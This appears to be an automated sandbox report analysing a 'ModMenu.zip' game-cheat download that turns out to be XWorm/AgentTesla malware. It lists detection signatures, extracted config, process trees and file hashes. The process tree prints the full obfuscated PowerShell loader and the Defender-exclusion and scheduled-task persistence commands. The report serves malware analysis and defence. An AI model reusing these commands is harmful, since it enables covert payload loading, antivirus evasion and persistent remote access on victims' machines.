Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/08/2024, 23:25

General

  • Target

    https://cdn.discordapp.com/attachments/1270768950028009604/1270879000570630175/ModMenu.zip?ex=66b54dcd&is=66b3fc4d&hm=f5e56265c8ea4fa443b7048f8a8debb8f19f9aac8a3eefe1d91e4af1b0ce156b&

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

vaD3dYcjaw0zWe1Y

Attributes
  • Install_directory

    %Temp%

  • install_file

    Registry.exe

  • pastebin_url

    https://pastebin.com/raw/fqZCUyFU

aes.plain

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 3 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1270768950028009604/1270879000570630175/ModMenu.zip?ex=66b54dcd&is=66b3fc4d&hm=f5e56265c8ea4fa443b7048f8a8debb8f19f9aac8a3eefe1d91e4af1b0ce156b&
    1⤵
      PID:1292
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4316,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=3788 /prefetch:1
      1⤵
        PID:980
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4896,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=4532 /prefetch:1
        1⤵
          PID:5044
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4768,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=5416 /prefetch:1
          1⤵
            PID:4176
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5552,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:8
            1⤵
              PID:1200
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5560,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=5644 /prefetch:8
              1⤵
                PID:2492
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=6400,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8
                1⤵
                  PID:2356
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5588,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=6504 /prefetch:1
                  1⤵
                    PID:1456
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6648,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=6636 /prefetch:1
                    1⤵
                      PID:5112
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=6632,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=6816 /prefetch:8
                      1⤵
                        PID:3992
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=4172,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=4732 /prefetch:8
                        1⤵
                          PID:2268
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6240,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=6864 /prefetch:8
                          1⤵
                            PID:116
                          • C:\Windows\System32\rundll32.exe
                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                            1⤵
                              PID:864
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                              1⤵
                              • Enumerates system info in registry
                              • Modifies data under HKEY_USERS
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of WriteProcessMemory
                              PID:3276
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.89 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.86 --initial-client-data=0x238,0x23c,0x240,0x214,0x25c,0x7ff850dfd198,0x7ff850dfd1a4,0x7ff850dfd1b0
                                2⤵
                                  PID:1880
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2316,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=2304 /prefetch:2
                                  2⤵
                                    PID:1184
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1944,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=3060 /prefetch:3
                                    2⤵
                                      PID:4484
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=1932,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=3168 /prefetch:8
                                      2⤵
                                        PID:2632
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4496,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=4520 /prefetch:8
                                        2⤵
                                          PID:3812
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4496,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=4520 /prefetch:8
                                          2⤵
                                            PID:1224
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4804,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=4820 /prefetch:1
                                            2⤵
                                              PID:2196
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --field-trial-handle=5116,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=5136 /prefetch:8
                                              2⤵
                                                PID:4560
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=5160,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=5172 /prefetch:8
                                                2⤵
                                                  PID:2336
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5548,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=5532 /prefetch:1
                                                  2⤵
                                                    PID:3228
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5624,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=5628 /prefetch:1
                                                    2⤵
                                                      PID:4664
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --pdf-upsell-enabled --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5648,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:1
                                                      2⤵
                                                        PID:3584
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=564,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=4592 /prefetch:8
                                                        2⤵
                                                          PID:4240
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=6076,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=4572 /prefetch:8
                                                          2⤵
                                                            PID:1924
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --field-trial-handle=2536,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=3196 /prefetch:8
                                                            2⤵
                                                              PID:3940
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4700,i,5974020648602610175,7770179347088081251,262144 --variations-seed-version --mojo-platform-channel-handle=4696 /prefetch:8
                                                              2⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1776
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"
                                                            1⤵
                                                              PID:4940
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ModMenu.bat" "
                                                              1⤵
                                                                PID:4668
                                                                • C:\Windows\system32\net.exe
                                                                  net file
                                                                  2⤵
                                                                    PID:2860
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 file
                                                                      3⤵
                                                                        PID:1872
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FGS3WxoYMxJyx16Bvgc6Ph7reegeuB9faZ4e4A83loY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5MgKDagoLhYWreVrfgcLRg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JDhdD=New-Object System.IO.MemoryStream(,$param_var); $JaTcd=New-Object System.IO.MemoryStream; $jjtfk=New-Object System.IO.Compression.GZipStream($JDhdD, [IO.Compression.CompressionMode]::Decompress); $jjtfk.CopyTo($JaTcd); $jjtfk.Dispose(); $JDhdD.Dispose(); $JaTcd.Dispose(); $JaTcd.ToArray();}function execute_function($param_var,$param2_var){ $nDMnA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QuICr=$nDMnA.EntryPoint; $QuICr.Invoke($null, $param2_var);}$DukIp = 'C:\Users\Admin\Desktop\ModMenu.bat';$host.UI.RawUI.WindowTitle = $DukIp;$CMWnf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DukIp).Split([Environment]::NewLine);foreach ($WBegn in $CMWnf) { if ($WBegn.StartsWith(':: ')) { $NGaHe=$WBegn.Substring(3); break; }}$payloads_var=[string[]]$NGaHe.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                      2⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Modifies registry class
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3896
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_511_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_511.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                        3⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4744
                                                                      • C:\Windows\System32\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_511.vbs"
                                                                        3⤵
                                                                        • Checks computer location settings
                                                                        PID:3368
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_511.bat" "
                                                                          4⤵
                                                                            PID:1704
                                                                            • C:\Windows\system32\net.exe
                                                                              net file
                                                                              5⤵
                                                                                PID:2052
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 file
                                                                                  6⤵
                                                                                    PID:2544
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FGS3WxoYMxJyx16Bvgc6Ph7reegeuB9faZ4e4A83loY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5MgKDagoLhYWreVrfgcLRg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $JDhdD=New-Object System.IO.MemoryStream(,$param_var); $JaTcd=New-Object System.IO.MemoryStream; $jjtfk=New-Object System.IO.Compression.GZipStream($JDhdD, [IO.Compression.CompressionMode]::Decompress); $jjtfk.CopyTo($JaTcd); $jjtfk.Dispose(); $JDhdD.Dispose(); $JaTcd.Dispose(); $JaTcd.ToArray();}function execute_function($param_var,$param2_var){ $nDMnA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QuICr=$nDMnA.EntryPoint; $QuICr.Invoke($null, $param2_var);}$DukIp = 'C:\Users\Admin\AppData\Roaming\startup_str_511.bat';$host.UI.RawUI.WindowTitle = $DukIp;$CMWnf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DukIp).Split([Environment]::NewLine);foreach ($WBegn in $CMWnf) { if ($WBegn.StartsWith(':: ')) { $NGaHe=$WBegn.Substring(3); break; }}$payloads_var=[string[]]$NGaHe.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                  5⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Drops startup file
                                                                                  • Adds Run key to start application
                                                                                  • Checks processor information in registry
                                                                                  • Enumerates system info in registry
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:828
                                                                                  • C:\Users\Admin\Desktop\WindowsFormsApp35.exe
                                                                                    "C:\Users\Admin\Desktop\WindowsFormsApp35.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Enumerates system info in registry
                                                                                    PID:2124
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                    6⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:2936
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                    6⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1224
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Registry'
                                                                                    6⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:4008
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Registry'
                                                                                    6⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3896
                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Registry" /tr "C:\Users\Admin\AppData\Local\Temp\Registry"
                                                                                    6⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:3368
                                                                        • C:\Users\Admin\AppData\Local\Temp\Registry
                                                                          C:\Users\Admin\AppData\Local\Temp\Registry
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:1512

                                                                        Network

                                                                              MITRE ATT&CK Enterprise v15

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                Filesize

                                                                                3KB

                                                                                MD5

                                                                                661739d384d9dfd807a089721202900b

                                                                                SHA1

                                                                                5b2c5d6a7122b4ce849dc98e79a7713038feac55

                                                                                SHA256

                                                                                70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

                                                                                SHA512

                                                                                81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                Filesize

                                                                                280B

                                                                                MD5

                                                                                e19d5667ad902d7bc82872a35aa4bdf6

                                                                                SHA1

                                                                                1bc212f0aff1906d4be16b45d7a2f7da15f2b8b3

                                                                                SHA256

                                                                                5388ec9e6c643a9babbbe0d6fd2040c9e1bb18f9fa94b131d2b7de5354848773

                                                                                SHA512

                                                                                194e5ff6cc9028989327525ccdd9fa522154295d3802013a8dafb26f34780a2bd9456f85682f681bbc9c2760374c83180cbd8a0830621a29c00e7136c82ef531

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                Filesize

                                                                                2B

                                                                                MD5

                                                                                99914b932bd37a50b983c5e7c90ae93b

                                                                                SHA1

                                                                                bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                SHA256

                                                                                44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                SHA512

                                                                                27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                68e333285bdf25cd7113818467a3b9a4

                                                                                SHA1

                                                                                7536b076b43209bad7a5a3c4a7f8739a0f302630

                                                                                SHA256

                                                                                22bc2881ffc76c8f7f43570dc5517877e922be1ba5617c41f07ed383714a6b38

                                                                                SHA512

                                                                                47d2d5983cfe11e315594f6fbc336b47db506da5813aa0d3b4a384c99b9e655c518ed0d39343408bda1d8e762c2b103a5742c5b5029fe5725f72604b5830664a

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                Filesize

                                                                                2B

                                                                                MD5

                                                                                d751713988987e9331980363e24189ce

                                                                                SHA1

                                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                                SHA256

                                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                SHA512

                                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

